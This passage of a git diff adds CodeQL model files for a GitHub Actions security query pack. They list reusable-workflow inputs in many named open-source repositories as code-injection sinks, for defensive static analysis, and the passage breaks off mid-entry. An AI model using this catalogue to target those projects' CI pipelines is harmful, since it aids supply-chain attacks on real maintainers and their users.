ql/lib/ext/generated/reusable-workflows/npm_abbrev-js.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_fs-minipass.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_hosted-git-info.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml create mode 100644 
ql/lib/ext/generated/reusable-workflows/npm_json-parse-even-better-errors.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_minify-registry-metadata.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_mute-stream.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml create mode 100644 
ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml create mode 100644 
ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml create mode 100644 
ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml create mode 100644 
ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml create mode 100644 ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml diff --git a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml new file mode 100644 index 000000000000..2e8a6683a576 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["0xpolygon/polygon-edge/.github/workflows/loadtest.yml", "*", "inputs.scenario", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml new file mode 100644 index 000000000000..55533f123127 --- /dev/null 
+++ b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["8vim/8vim/.github/workflows/publish.yaml", "*", "inputs.version_code", "code-injection", "generated"] + - ["8vim/8vim/.github/workflows/publish.yaml", "*", "inputs.version_name", "code-injection", "generated"] + - ["8vim/8vim/.github/workflows/bump-version.yaml", "*", "inputs.message", "code-injection", "generated"] + - ["8vim/8vim/.github/workflows/build.yaml", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml new file mode 100644 index 000000000000..a14d41a15b9c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "inputs.base-pr-branch", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "inputs.head-pr-branch", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "inputs.reference-files", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "inputs.target-folder", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/codeql-analysis.yml", "*", "inputs.build-command", "code-injection", "generated"] + - ["actions/reusable-workflows/.github/workflows/check-dist.yml", "*", "inputs.dist-path", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml new file mode 100644 index 000000000000..0888318ad93c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["adap/flower/.github/workflows/_docker-build.yml", "*", "inputs.namespace-repository", "code-injection", "generated"] + - ["adap/flower/.github/workflows/_docker-build.yml", "*", "inputs.file-dir", "code-injection", "generated"] + - ["adap/flower/.github/workflows/_docker-build.yml", "*", "inputs.build-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml new file mode 100644 index 000000000000..6ea6dcdab704 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "inputs.wheel-tags-to-skip", "code-injection", "generated"] + - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "inputs.qemu", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml new file mode 100644 index 000000000000..2c18a166cc1f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "inputs.wheel-tags-to-skip", "code-injection", "generated"] + - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "inputs.qemu", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml new file mode 100644 index 000000000000..f065947dbdcc --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["airbytehq/airbyte/.github/workflows/connector-performance-command.yml", "*", "inputs.connector", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml new file mode 100644 index 000000000000..438525e77e23 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["alphagov/collections/.github/workflows/pact-verify.yml", "*", "inputs.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml new file mode 100644 index 000000000000..ca3111ad03af --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["alphagov/frontend/.github/workflows/pact-verify.yml", "*", "inputs.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml new file mode 100644 index 000000000000..1e09e05e8b62 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["alphagov/publishing-api/.github/workflows/pact-verify.yml", "*", "inputs.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml new file mode 100644 index 000000000000..ad061ca714da --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml 
@@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "inputs.module", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "inputs.jdk", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "inputs.sql_compatibility", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "inputs.override_config_path", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "inputs.testing_groups", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "inputs.use_indexer", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-standard-its.yml", "*", "inputs.runtime_jdk", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "inputs.it", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "inputs.script", "code-injection", "generated"] + - ["apache/druid/.github/workflows/reusable-revised-its.yml", "*", "inputs.build_jdk", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml new file mode 100644 index 000000000000..3a721a0f2cf9 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "inputs.environment", "code-injection", "generated"] + - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "inputs.workflow-caller-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml new file mode 100644 index 000000000000..bdabbb9ab609 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["apache/spark/.github/workflows/build_and_test.yml", "*", "inputs.branch", "code-injection", "generated"] + - ["apache/spark/.github/workflows/build_and_test.yml", "*", "inputs.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml new file mode 100644 index 000000000000..6d8438462a8c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["argilla-io/argilla/.github/workflows/run-python-tests.yml", "*", "inputs.pytestArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml new file mode 100644 index 000000000000..6d7bf7af0c2d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "inputs.docker_image_name", "code-injection", "generated"] + - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "inputs.ghcr_image_name", "code-injection", "generated"] + - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "inputs.quay_image_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml new file mode 100644 index 000000000000..b3b198fbf653 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "inputs.docker_image_name", "code-injection", "generated"] + - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "inputs.ghcr_image_name", "code-injection", "generated"] + - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "inputs.quay_image_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml new file mode 100644 index 000000000000..9c3ae9bf1946 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["aws-amplify/amplify-ui/.github/workflows/reusable-tagged-publish.yml", "*", "inputs.dist-tag", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml new file mode 100644 index 000000000000..68a85006c6cc --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["azure/apiops/tools/github_workflows/run-publisher-with-env.yaml", "*", "inputs.API_MANAGEMENT_SERVICE_OUTPUT_FOLDER_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml new file mode 100644 index 000000000000..ee336ee076c8 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml 
@@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["azure/mlops-templates/.github/workflows/tf-gha-install-terraform.yml", "*", "inputs.terraform_workingdir", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "inputs.parameters-file", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "inputs.workspace_name", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "inputs.resource_group", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "inputs.dockerfile-location", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "inputs.environment_file", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "inputs.workspace_name", "code-injection", "generated"] + - ["azure/mlops-templates/.github/workflows/register-environment.yml", "*", "inputs.resource_group", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml new file mode 100644 index 000000000000..3d3f727923a0 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "inputs.git-user-email", "code-injection", "generated"] + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "inputs.git-user-name", "code-injection", "generated"] + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "inputs.track", "code-injection", "generated"] + - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "inputs.package-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml new file mode 100644 index 000000000000..f18d1e4c50ab --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "inputs.git-user-email", "code-injection", "generated"] + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "inputs.git-user-name", "code-injection", "generated"] + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "inputs.track", "code-injection", "generated"] + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "inputs.package-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml new file mode 100644 index 000000000000..21db2585a5e8 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "inputs.shell", "code-injection", "generated"] + - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "inputs.environment", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml new file mode 100644 index 000000000000..3f263608c21b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bdunderscore/modular-avatar/.github/workflows/build-test-docs.yml", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml new file mode 100644 index 000000000000..017d0bc89f53 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["benc-uk/workflow-dispatch/.github/workflows/echo-3.yaml", "*", "inputs.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml new file mode 100644 index 000000000000..1a38d6b35ade --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "inputs.REGISTRY", "code-injection", "generated"] + - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "inputs.IMAGE_NAME", "code-injection", "generated"] + - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "inputs.IMAGE_TAG", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml new file mode 100644 index 000000000000..339d7b1dd0a2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bugsnag/bugsnag-ruby/.github/workflows/run-maze-runner.yml", "*", "inputs.features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml new file mode 100644 index 000000000000..ff0f83454c2d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml 
@@ -0,0 +1,22 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.the_path", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.last_commit", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.binary_name_stem", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamrc.yml", "*", "inputs.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamrc.yml", "*", "inputs.runner", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_vscode_ext.yml", "*", "inputs.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.runner", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.config_file", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.wasi_sdk_url", 